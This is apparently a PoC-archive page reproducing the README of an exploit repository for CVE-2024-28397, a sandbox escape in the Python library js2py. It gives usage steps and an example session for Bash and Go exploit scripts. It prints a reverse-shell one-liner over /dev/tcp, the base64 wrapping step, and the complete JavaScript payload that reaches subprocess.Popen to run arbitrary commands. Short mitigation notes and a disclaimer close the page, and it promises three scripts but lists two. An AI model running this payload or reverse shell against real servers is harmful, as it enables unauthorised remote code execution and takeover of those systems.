关联漏洞
标题:
Js2Py 安全漏洞
(CVE-2024-28397)
描述:Js2Py是Python基金会的一个库。用于将 JavaScript 转换为 Python 代码。 Js2Py 0.74 及之前版本存在安全漏洞,该漏洞源于组件 js2py.disable_pyimport() 中存在一个问题,攻击者利用该漏洞可以通过精心设计的 API 调用执行任意代码。
介绍
# CVE-2024-28397 js2py Sandbox Escape Exploit
A collection of exploit scripts targeting the js2py sandbox escape vulnerability (CVE-2024-28397) that allows arbitrary code execution through Python object introspection.
## 🔍 Vulnerability Overview
The js2py library contains a critical sandbox escape vulnerability that allows attackers to execute arbitrary Python code by accessing internal Python objects through JavaScript's `Object.getOwnPropertyNames()` method.
### Technical Details
- **CVE ID**: CVE-2024-28397
- **Affected Library**: js2py (JavaScript to Python translator)
- **Attack Vector**: Sandbox escape via Python object introspection
- **Impact**: Remote Code Execution (RCE)
## 📋 Reference Analysis
This exploit is based on the comprehensive analysis by Marven11:
- **Analysis Document**: [CVE-2024-28397 js2py Sandbox Escape Analysis](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_en.md)
## 🛠️ Exploit Scripts
This repository contains three different implementations:
### 1. Bash Script (`exploit.sh`)
Lightweight bash implementation using curl and jq.
### 2. Go Script (`exploit.go`)
Cross-platform Go implementation with built-in HTTP client.
## 🚀 Quick Start
### Prerequisites
- **For Bash script**: `curl`, `jq`, `base64`
- **For Go script**: Go 1.16+
### Usage
All scripts are interactive and will prompt for required information:
```bash
# Bash version
chmod +x exploit.sh
./exploit.sh
# Go version
go run exploit.go
```
### Interactive Prompts
Each script will ask for:
1. **Target URL**: The endpoint running vulnerable js2py code
2. **Your IP**: Your machine's IP address for reverse shell
3. **Your Port**: Port number for reverse shell connection
### Example Session
```bash
$ ./exploit.sh
Target URL: http://target.example.com:8000/run_code
Your IP: 10.10.14.3
Your Port: 9001
Sending to http://target.example.com:8000/run_code with reverse shell 10.10.14.3:9001
{"result": "executed"}
```
## 🎯 How It Works
### 1. Payload Generation
The exploit dynamically creates a reverse shell command:
```bash
sh -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1
```
### 2. Base64 Encoding
The shell command is base64-encoded for safe transmission:
```bash
base64_payload=$(echo -n "$reverse_shell" | base64 -w 0)
```
### 3. JavaScript Sandbox Escape
The core exploit uses JavaScript to access Python's internal objects:
```javascript
let cmd = "printf BASE64_PAYLOAD|base64 -d|bash";
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a,"__class__"), "__base__");
function findpopen(o) {
for(let i in o.__subclasses__()) {
let item = o.__subclasses__()[i];
if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
return item;
}
if(item.__name__ != "type") {
let result = findpopen(item);
if(result) return result;
}
}
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
```
### 4. Execution Flow
1. Access Python's object system through `Object.getOwnPropertyNames({})`
2. Navigate to base classes via `__class__.__base__.__getattribute__`
3. Search subclasses for `subprocess.Popen`
4. Execute arbitrary system commands through `Popen`
## 🛡️ Mitigation
- Update js2py to a patched version
- Implement proper input validation and sanitization
- Use secure sandboxing alternatives
- Apply defense-in-depth security measures
## 📚 Educational Purpose
These scripts are provided for educational and authorized testing purposes only. Always ensure you have proper authorization before testing against any systems.
## 🔗 References
- [CVE-2024-28397 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28397)
- [Marven11's Detailed Analysis](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_en.md)
- [js2py GitHub Repository](https://github.com/PiotrDabkowski/Js2Py)
## ⚖️ Disclaimer
This software is provided for educational and authorized security testing purposes only. Users are responsible for complying with applicable laws and obtaining proper authorization before use.
文件快照
[4.0K] /data/pocs/9a94d289f442fa8d9dba31555f34bd146d3a2f43
├── [1.6K] exploit.go
├── [1.0K] exploit.sh
└── [4.1K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。